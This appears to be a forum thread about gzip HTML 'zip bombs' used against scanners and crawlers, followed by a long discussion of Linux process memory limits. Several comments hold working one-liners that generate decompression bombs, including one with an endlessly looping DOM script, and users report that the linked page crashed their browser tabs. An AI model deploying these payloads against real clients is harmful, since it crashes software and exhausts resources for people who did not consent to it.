bhaney 2 days ago

Neat approach. I make my anti-crawler HTML zip bombs like this:

    (echo '<html><head></head><body>' && yes "<div>") | dd bs=1M count=10240 iflag=fullblock | gzip > bomb.html.gz

So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.
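
A quick way to sanity-check the ratio (sizes are approximate and depend on your gzip version/level):

    # the file on disk should come out around 10MB...
    ls -lh bomb.html.gz
    # ...while the decompressed stream counts out to roughly 10GiB, without touching disk
    zcat bomb.html.gz | wc -c
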
  • pyman 2 days ago

    This is a great idea.

    LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.

    We need more ideas like this!

    • bhaney a day ago

      This is the same idea as in the article, just an alternative flavor of generating the zip bomb.

      And I actually only serve this to exploit scanners, not LLM crawlers.

      I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:

      - The site's robots.txt didn't actually say what the author thought they had made it say

      - The crawler had nothing to do with the crawler it was claiming to be; it just hijacked a user agent to deflect blame

      It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.

  • _ache_ 2 days ago

    Nice command line.

chatmasta 2 days ago

Note: the submission link is not the zip bomb. It’s safe to click.

  • abirch 2 days ago

    Sounds like something a person linking to a zip bomb would say :-D

andrew_eu 2 days ago

I can imagine large-scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb, they could simply discard the chunks that are inside a comment. The same trick could be applied to other elements in the HTML, though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs, that could also have an amplifying effect on a bad scraper.
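
A rough sketch of the style-tag variant (the padding rule is arbitrary; it reuses the dd/gzip pipeline from the div bomb upthread):

    # pad a <style> block with endless no-op rules instead of an HTML comment;
    # a scraper that strips comments still has to chew through this
    (echo '<html><head><style>' && yes '.x{color:red}') \
        | dd bs=1M count=10240 iflag=fullblock | gzip > bomb-style.html.gz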

  • _ache_ 2 days ago

    There are definitely improvements that can be made. The comment part is more about aesthetics; it isn't actually needed, you could have just put the zip chunk in a `div`, I guess.

PeterStuer 2 days ago

For every 1 robots.txt that is genuinely configured, there are 9 that make absolutely no sense at all.

Worse: GETting the robots.txt automatically flags you as a 'bot'!

So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that the cheapest junior webadmin you hired copy/pasted there from some reddit comment, we now have to jump through hoops such as getting the robots.txt from a separate VPN, etc.

  • Grimblewald a day ago

    Well, robots.txt being an opaque, opt-out system was broken from the start. I've just started having hidden links and pages only mentioned in robots.txt, and any IP that tries those is immediately blocked for 24 hours. There is no reason to continue entertaining these companies.
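
    Roughly like this (the log format, trap path, and plain-iptables ban are just example assumptions):

        # nginx-style access log; /honeypot/ is referenced only in robots.txt
        awk '$7 ~ "^/honeypot/" {print $1}' /var/log/nginx/access.log | sort -u |
        while read -r ip; do
            iptables -A INPUT -s "$ip" -j DROP   # a cron job can flush these after 24h
        done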

slig 2 days ago

If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?

  • bhaney a day ago

    If you're doing this through cloudflare, you'll want to add the response header

        cache-control: no-transform
    
    so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.

    That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.
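
    If you want to verify from the outside that cloudflare is passing the gzip through untouched, something like this works (the URL is a placeholder):

        # fetch just the headers, discard the small compressed body, and check that
        # content-encoding: gzip and the no-transform directive both survived
        curl -s -o /dev/null -D - -H 'Accept-Encoding: gzip' https://example.com/bomb.html \
            | grep -iE 'content-encoding|cache-control'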

  • uxjw a day ago

    Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/

    • cyanydeez a day ago

      Do you think Meta AI's llama 4 failed so badly cause they ended up crawling a bunch of labyrinths?

Alifatisk 21 hours ago

I dislike that the website's sidebar all of a sudden collapses during scrolling; it shifts all the content to the left in the middle of reading.

fdomingues a day ago

That content shift on page scroll is horrendous. Please don't do that, there is no need to auto-hide a sidebar.

Telemakhos 2 days ago

Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.

can16358p 2 days ago

Crashes Safari on iOS (not technically crashing the whole app, but the tab displays an internal WebKit error).

cooprh 2 days ago

Crashed 1password on safari haha

xd1936 2 days ago

Risky click

ranger_danger 2 days ago

Did not crash Firefox or Chrome for me on Linux.

  • _ache_ 2 days ago

    Perhaps you have very generous limits on RAM allocation per process. I have 32GB, 128GB with swap, and it still crashes (silently on Firefox and with a dedicated error screen on Chrome).

    • throwaway127482 2 days ago

      Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04

      • _ache_ 2 days ago

        Usually in /etc/security/limits.conf. The `as` field, for address space, would be my guess, but I'm not sure, maybe `data`. The man page `man limits.conf` isn't very descriptive.
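
        If you just want to experiment without editing limits.conf, a shell-level cap works too (the 4 GiB value is arbitrary):

            # cap virtual address space (RLIMIT_AS) for this shell and its children;
            # ulimit -v takes KiB, so this is ~4 GiB
            ulimit -v 4194304
            firefox &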

        • inetknght 2 days ago

          > The man page `man limits.conf` isn't very descriptive.

          Looks to me like it's quite descriptive. What information do you think is missing?

          https://www.man7.org/linux/man-pages/man5/limits.conf.5.html

          • _ache_ a day ago

            What is `data`? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical?

            What is the maximum file size in the context of a process?! I mean, what happens if a file is bigger? Maybe it can't write a file bigger than that, maybe it can't execute a file bigger than that.

            I have a bunch of questions.

            • inetknght an hour ago

              > I have a bunch of questions.

              If I were reading the documentation for higher level language APIs, I'd also read the documentation for setting up/using the types that are associated.

              With well-written documentation, there's usually related information and/or see-also. Indeed, this has `SEE ALSO` for `getrlimit(2)`, which is equivalent to `man 2 getrlimit` [0].

              From there, the things are a bit more descriptive.

                     RLIMIT_AS
                            This is the maximum size of the process's virtual memory
                            (address space).  The limit is specified in bytes, and is
                            rounded down to the system page size.  This limit affects
                            calls to brk(2), mmap(2), and mremap(2), which fail with
                            the error ENOMEM upon exceeding this limit.  In addition,
                            automatic stack expansion fails (and generates a SIGSEGV
                            that kills the process if no alternate stack has been made
                            available via sigaltstack(2)).  Since the value is a long,
                            on machines with a 32-bit long either this limit is at most
                            2 GiB, or this resource is unlimited.
              
                     RLIMIT_DATA
                            This is the maximum size of the process's data segment
                            (initialized data, uninitialized data, and heap).  The
                            limit is specified in bytes, and is rounded down to the
                            system page size.  This limit affects calls to brk(2),
                            sbrk(2), and (since Linux 4.7) mmap(2), which fail with the
                            error ENOMEM upon encountering the soft limit of this
                            resource.
              
              The documentation also links to the affected system calls (`brk` [1], `sbrk` [1], `mmap` [2], `mremap` [3], and `sigaltstack` [4]). Note that all of this is in sections 2 and 3 of the manual, for system interface calls and libraries that interact with the system. You might find some installations of Linux complaining about missing documentation (e.g. minimized containers and/or release distros -- documentation takes up a decent chunk of disk space and isn't generally needed outside of a developer's workstation), in which case the most likely fix is to re/install the documentation package via your package manager.

              So,

              > What is `data` ? "maximum data size (KB)".

              "data" is the process's data segment [1]. Perhaps this might be clearer, but it is fairly well defined if you then read the documentation for `brk` [1]:

                     brk() and sbrk() change the location of the program break, which
                     defines the end of the process's data segment (i.e., the program
                     break is the first location after the end of the uninitialized
                     data segment).  Increasing the program break has the effect of
                     allocating memory to the process; decreasing the break deallocates
                     memory.
              
              This rabbit hole goes into describing system internals for process memory layouts [5] and it can expand pretty widely into understanding how's and why's. This level of system knowledge is literally understanding your operating system and... it's IMO well documented if you just keep searching terms that you're unfamiliar with; instead of `man` you might try `apropos` (and see `man apropos`). You'll end up exploring a huge chunk of the C-language system API, and a fair bit of glibc too.

              Then,

              > Is `address space limit (KB)` virtual or physical ?

              First sentence of the C-language documentation for RLIMIT_AS:

                     RLIMIT_AS
                            This is the maximum size of the process's virtual memory
                            (address space).
              
              > What is maximum filesize in a context of a process ?!

              System API `open()`, `opendir()`, `openat()`, [6] etc with _system file descriptors_? Well assuming your _file descriptor_ points to a file, then it's whatever the filesystem supports. But your system generally can support 32-bit-or-64-bit (depending on macros usually defined during kernel compilation) with `lseek` [7] and `off_t` [8], or you can force 64-bit bit support with `lseek64` [9] and `off64_t` [8], and fail to compile your app if your kernel wasn't compiled with 64-bit support.

              It's more complicated if you use a different API (such as C's FILE* functions [10] or etc).

              > what happens if a file is bigger?

              I'm not sure -- I've never had to worry about it because I use the 64-bit APIs. You could try mounting a filesystem supporting 64-bit files, then write a file beyond 32-bits, then boot into a 32-bit OS and try mounting it and reading the file. You'll probably get an error code that you can then look up in the documentation. If it's not clear what it is, then the kernel source code is fairly easy to navigate to find where the error could come from and what it might mean, and I've done it for mremap failures.

              > Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.

              That heavily depends on system architecture and your operating system support. But unless I'm mistaken with Linux on x86_64, just about any user-land virtual address page can be marked executable; but it's different in kernel-land with reserved/register/io address space.

              And, as I understand it, the kernel memory-maps your executable from your filesystem. So, generally, user-land code can map to "anywhere" (this is good for ASLR safety) and could be executed even with minimal physical address space available. But in practice, your executable is mapped to within a certain region of the virtual address space, which leaves the other region of your address space available for allocations (this is how `brk` works). What's generally far more important is how much memory you might allocate during your program's lifecycle, and whether or not you end up fragmenting that memory.

              In any case, the documentation for `/etc/security/limits.conf` (linked earlier) states:

                     If a hard limit or soft limit of a resource is set to a valid
                     value, but outside of the supported range of the local system, the
                     system may reject the new limit or unexpected behavior may occur.
                     If the control value required is used, the module will reject the
                     login if a limit could not be set.
              
              If you set your limits so low that you can't start processes because you run out of address space while trying to load them, then that might be classified as "unexpected behavior" if you didn't expect that to happen and so is... well documented. I don't see where it says anything about "valid value" or "supported range" for specific limits, but for those I would just poke around the kernel source code [11] where those C macros are used and look for limits around them. `grep -nR` [12] is what I'd use for that.

              That's enough rabbit hole for me.

              [0]: https://www.man7.org/linux/man-pages/man2/getrlimit.2.html

              [1]: https://www.man7.org/linux/man-pages/man2/brk.2.html

              [2]: https://www.man7.org/linux/man-pages/man2/mmap.2.html

              [3]: https://www.man7.org/linux/man-pages/man2/mremap.2.html

              [4]: https://www.man7.org/linux/man-pages/man2/sigaltstack.2.html

              [5]: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format

              [6]: https://man7.org/linux/man-pages/man2/open.2.html

              [7]: https://man7.org/linux/man-pages/man2/lseek.2.html

              [8]: https://man7.org/linux/man-pages/man3/off64_t.3type.html

              [9]: https://man7.org/linux/man-pages/man3/lseek64.3.html

              [10]: https://man7.org/linux/man-pages/man3/file.3type.html

              [11]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...

              [12]: https://man7.org/linux/man-pages/man1/grep.1.html

  • AndrewThrowaway 18 hours ago

    Crashed the Chrome tab on Windows instantly, but Firefox is fine. It shows as loading, but pressing Ctrl+U even shows the very start of that fake HTML.

  • palmfacehn 2 days ago

    Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.
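
    Something along these lines, for example (the sizes and the script are arbitrary):

        { echo '<html><body>'
          # ~100M unclosed divs parse as deeply nested nodes...
          yes '<div>' | head -n 100000000
          # ...and once parsing gets this far, the inline script keeps allocating more
          echo '<script>for(;;)document.body.appendChild(document.createElement("div"))</script>'
        } | gzip > nested-bomb.html.gz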

    • meinersbur 2 days ago

      It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to get a parser to bail early.

      • palmfacehn 2 days ago

        For my usage, the compressed size difference with deeply nested divs was negligible.

  • esperent 2 days ago

    It crashed the tab in Brave on Android for me.

  • johnisgood 2 days ago

    It crashed the tab on Vivaldi (Linux).

Tepix 2 days ago

Imagine you’re a crawler operator. Do you really have a problem with documents like this? I don’t think so.